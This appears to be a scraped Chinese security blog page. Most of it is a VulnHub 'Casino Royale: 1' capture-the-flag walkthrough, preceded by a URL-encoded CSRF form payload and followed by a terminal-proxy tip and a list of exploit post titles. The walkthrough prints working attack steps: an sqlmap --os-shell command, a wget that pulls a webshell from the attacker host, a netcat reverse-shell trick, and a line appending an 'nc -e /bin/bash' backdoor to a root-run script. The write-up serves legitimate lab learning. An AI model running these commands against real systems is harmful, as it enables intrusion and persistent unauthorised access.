key%5B%5D=return&value%5B%5D=Return&key%5B%5D=yes&value%5B%5D=Yes&key%5B%5D=no&value%5B%5D=No&key%5B%5D=modify&value%5B%5D=Modify&key%5B%5D=articlemodify&value%5B%5D=Article+Modify&key%5B%5D=type&value%5B%5D=Type&key%5B%5D=moreupload&value%5B%5D=Up+to+upload&key%5B%5D=success&value%5B%5D=Success&key%5B%5D=fail&value%5B%5D=Fail&key%5B%5D=upload&value%5B%5D=Upload&key%5B%5D=uploadtime&value%5B%5D=Upload+Time&key%5B%5D=contactus&value%5B%5D=Contact+Us&key%5B%5D=previouspage&value%5B%5D=Prev&key%5B%5D=nextpage&value%5B%5D=Next&key%5B%5D=firstpage&value%5B%5D=First&key%5B%5D=lastpage&value%5B%5D=Last&key%5B%5D=totalpage&value%5B%5D=Total&key%5B%5D=currentpage&value%5B%5D=Current&key%5B%5D=buy&value%5B%5D=Buy&key%5B%5D=mailverify&value%5B%5D=Email+validation&key%5B%5D=welcome&value%5B%5D=Welcome&key%5B%5D=close&value%5B%5D=closed&key%5B%5D=findpassword&value%5B%5D=Find+Password&key%5B%5D=contactmanager&value%5B%5D=Contact+Manager&key%5B%5D=orderdetaillogin&value%5B%5D=For+order+details%2Cplease+visit+the+website.&key%5B%5D=enterusername&value%5B%5D=Please+enter+username%21&key%5B%5D=enterpassword&value%5B%5D=Please+enter+password%21&key%5B%5D=enteremail&value%5B%5D=Please+enter+Email%21&key%5B%5D=emailerr&value%5B%5D=Email+error%21&key%5B%5D=entertitle&value%5B%5D=Please+enter+title%21&key%5B%5D=entercontent&value%5B%5D=Please+enter+content%21&key%5B%5D=selecttype&value%5B%5D=Type+must+be+selected%21&key%5B%5D=enterauthor&value%5B%5D=Please+enter+author%21&key%5B%5D=enterpasswords&value%5B%5D=Please+confirm+the+password%21&key%5B%5D=passworderr&value%5B%5D=The+codes+don&key%5B%5D=entercaptcha&value%5B%5D=Please+enter+captcha%21&key%5B%5D=captchaerr&value%5B%5D=Captcha+error%21&key%5B%5D=mailsenderr&value%5B%5D=Mail+not+sent%21&key%5B%5D=mailok&value%5B%5D=Please+check+email%21&key%5B%5D=pleasemailverify&value%5B%5D=Please+check+email+for+verification%21&key%5B%5D=mailverifycode&value%5B%5D=Email+Authentication+Code&key%5B%5D=mailcopylink&value%5B%5D=Please+copy+the+following+link&key%5B%5D=totalnum&value%5B%5D=Total+Num&key%5B%5D=updateok&value%5B%5D=Update+successed%21&key%5B%5D=updateno&value%5B%5D=Failed+to+update%21&key%5B%5D=payok&value%5B%5D=Successful+payment%21&key%5B%5D=payno&value%5B%5D=Payment+Failed%21&key%5B%5D=createempty&value%5B%5D=Required+field+is+empty%21&key%5B%5D=createok&value%5B%5D=Create+successed%21&key%5B%5D=createno&value%5B%5D=Failed+to+create%21&key%5B%5D=gotopay&value%5B%5D=Go+to+pay%21&key%5B%5D=untieok&value%5B%5D=Untie+successed%21&key%5B%5D=untieno&value%5B%5D=Untie+failed%21&key%5B%5D=delok&value%5B%5D=Delete+successed%21&key%5B%5D=delno&value%5B%5D=Delete+failed%21&key%5B%5D=regclose&value%5B%5D=Website+registration+closed%21&key%5B%5D=regmailerr&value%5B%5D=Account+or+email+registered%21&key%5B%5D=loginusererr&value%5B%5D=Account+does+not+exist%21&key%5B%5D=loginpasserr&value%5B%5D=Account+or+password+does+not+match%21&key%5B%5D=administratorreply&value%5B%5D=The+administrator+has+not+responded%2C+please+wait+patiently.&key%5B%5D=noscript&value%5B%5D=Sorry%2C+your+browser+disabled+JavaScript%2C+it+may+not+be+able+to+use+some+of+the+site&key%5B%5D=readmecontent&value%5B%5D=We+guarantee+that+the+outer+packing+of+the+goods+is+in+good+condition+at+the+time+of+shipment.+When+you+receive+the+goods%2C+please+carefully+check+whether+the+invoice+and+the+goods+are+consistent+with+the+delivery+order.+If+you+find+that+the+goods+are+missing+or+damaged%2C+please+contact+our+customer+service+department+on+the+spot+when+the+delivery+personnel+are+still+on+the+scene%3B+If+you+find+that+the+package+is+damaged+or+the+goods+are+damaged+in+transit%2C+please+point+out+and+refuse+to+accept+it+on+the+spot.+After+refusal%2C+please+call+our+customer+service.+If+you+have+signed+for+it+or+someone+else+has+signed+for+it%2C+you+will+be+considered+as+the+packaging%2C+quantity+and+content+of+the+goods.+I+will+not+be+able+to+accept.&key%5B%5D=copyright&value%5B%5D=Copyright&key%5B%5D=cssdisplay&value%5B%5D=none&key%5B%5D=test&value%5B%5D=Test

##CSRF配合上面的后台getshell

Casino Royale: 1

Wed, 27 Feb 2019 11:24:30 +0800

难度：

Intermediate

关于：

Will you gain your status as a 00 agent?

题目地址：https://www.vulnhub.com/entry/casino-royale-1,287/#

Flags:

您的目标是获取root和Flag is /root/flag/flag.sh

Write Up：

0x01 获取root

1.通过nmap扫描靶机端口版本，发现存在四个端口：21、25、80、8081 nmap -sV x.x.x.x

2.我们从80端口入手，首先查看网页的源代码并无发现线索，其次对80端口进行目录爆破找到一个phpmyadmin的登陆页面和一个install dirb [url]

3.我们开打install页面出现这样一个界面，点击cliek to start install 后页面报错

4.存在install页面说明网站肯定存在这个cms，我们查找相关cms版本信息并获取到源代码且存在一个exp漏洞

5.翻开源代码后台路径是pokeradmin，并且发现登陆处并且未做sql注入防护

6.直接使用sqlmap跑取账户密码后getshell sqlmap.py -u 'http://192.168.235.140:80/pokeradmin/' --data='op=adminlogin&username=admin&password=admin' --level=5 --risk=3 --os-shell

7.将kali开一个apache把一句话放在/var/www/html中，然后在靶机的shell中运行wget

8.打开中国蚁剑或中国菜刀（效果是一样的）配置如下

9.getshell后我们先将数据库的账户密码保存下来 valenka:11archives11!

10.在一段查看后没有发现有价值的信息，查看8081端口，主页面有一个Run Data Collect的按钮，点击后访问到collect.php

11.因为我们已经拿到www-data的权限了所以我们可以通过find来查找collect.php，找到8081端口的主目录在/opt/casino-royale/ find / -name [name]

12.进入8081端口主目录后查看文件权限

13.查看权限后发现只有casino-data-collection.py这个文件我可以修改，cat查看文件内容，python文件打开了user-data.log继续查看里面内容与collect.php内容一样

14.继续查看collect.php，基本了解程序大概的过程和出题人的思路，collect.php为root权限只可读所以不能更改但是执行的casino-data-collection.py为www-data组所以可以修改，而casino-data-collection.py打开了user-data.log所以php读到了log的内容，所以我们只要修改python文件即可获取到le的权限解题思路：在python文件中通过os模块执行系统命令返回nc拿到le权限

15.修改python后，再在浏览器重新打开页面靶机会开启一个带bash的1111端口，使用攻击机的nc连接,获取到le的权限

16.但是这是一个半交互式的页面无法切换账户，通过查阅资料可以通过python调用本地shell

echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py

python /tmp/asdf.py

17.在获取到le的交互式shell后尝试第九步中valenka的账户密码登录。成功登陆但是先切回le，exit退出 valenka:11archives11!

18.查看run.sh，并尝试运行mi6_detect_test这个程序，发现与run.sh中的内容相同，我猜测mi6_detect_test就是将run.sh运行

18.mi6_detect_test为root所以我们通过echo命令把后门写入run.sh在运行mi6既可获取到root权限 echo "nc -lvvp 1234 -t -e /bin/bash" >> run.sh

19.成功监听端口，攻击机nc连接靶机，并getflag

难点总结： 1.python半交互式切换到全交互式 2.mi6_detect_test和run.sh程序的关联 3.理清这几个程序之间的关系 4.无法通过内核漏洞提权

让终端走代理的方法

Thu, 21 Feb 2019 11:24:30 +0800

把代理服务器地址写入shell配置文件.bashrc或者.zshrc

直接在.bashrc或者.zshrc添加下面内容

1.export http_proxy="http://localhost:port"
2.export https_proxy="http://localhost:port"

以使用shadowsocks代理为例，ss的代理端口为1080,那么应该设置为

1.export http_proxy="socks5://127.0.0.1:1080"
2.export https_proxy="socks5://127.0.0.1:1080"

或者直接设置ALL_PROXY

1.export ALL_PROXY=socks5://127.0.0.1:1080

localhost就是一个域名，域名默认指向 127.0.0.1，两者是一样的。

然后ESC后:wq保存文件，接着在终端中执行

source ~/.bashrc

或者退出当前终端再起一个终端。这个办法的好处是把代理服务器永久保存了，下次就可以直接用了。

或者通过设置alias简写来简化操作，每次要用的时候输入setproxy，不用了就unsetproxy。

1.alias setproxy="export ALL_PROXY=socks5://127.0.0.1:1080"
2.alias unsetproxy="unset ALL_PROXY"
3.alias ip="curl -i http://ip.cn"

2019国庆武夷山骑行

Mon, 01 Jan 0001 00:00:00 +0000

Posts on Ca1s1'Blog

MoviePilotv2 Arbitrary file read

describe

repair

Turbo Intruder条件竞争代码

Turbo Intruder

条件竞争

Spring添加路由实现ssrf

Sliver服务端口丢失客户端自动断开

Truenas 安装 UT650EGC UPS

Truenas 安装 UT650EGC UPS

OSWE考试总结

时间记录

自我介绍

考试

为什么要考 OSWE

MAC下微信浏览器可能可行的利用方式

CVE-2022-22954

CVE-2022-22954

代码分析

getErrorPage

handleUnauthorizedError

攻击方式

文件落地webshell

AWD FLAG SCRIPT

AWD FLAG脚本

CTFD plugin xss

CTFD 插件 存储型 XSS

thinkphp3.1.3 sql注入 bypass

thinkphp3.1.3 bypass sql注入

观安CTF 2021 WriteUp

WEB

Baby Calc

Baby WEB

Misc

老电脑的内存

release

2021年虎符线下赛WEB

tinypng

Easyflask

JEB_Debug_Encrypt

JEB 动态调试 加密

工具

操作

CTF内网渗透题

2019神盾杯

0x00 babyJS

0x01 crypto_easy_1

0x02 ez_gallery_1

0x04 Easyadmin

0x05 Easyupload

0x06 Easysqli

jsEncrypter 加密

burp 爆破 JS加密

豌豆杯入学CTF

web题我是全部AK掉了有些题目是通过exp直接拿到flag太简单了就不讲了。 Crypto题

REVERSE

RedHat2021 CTF

线上赛

find_it

framework

WebsiteManger

通达OA文件上传&文件包含导致RCE复现

漏洞复现

影响版本：

测试环境：

漏洞复现：

漏洞分析：

Uscms代码审计

0x01 第一处：前台任意文件删除

0x02 绕过后台验证码爆破

0x03 后台GETSHELL

Casino Royale: 1

难度：

关于：

Flags:

Write Up：

0x01 获取root

让终端走代理的方法

2019国庆武夷山骑行

CTFD 插件存储型 XSS

JEB 动态调试加密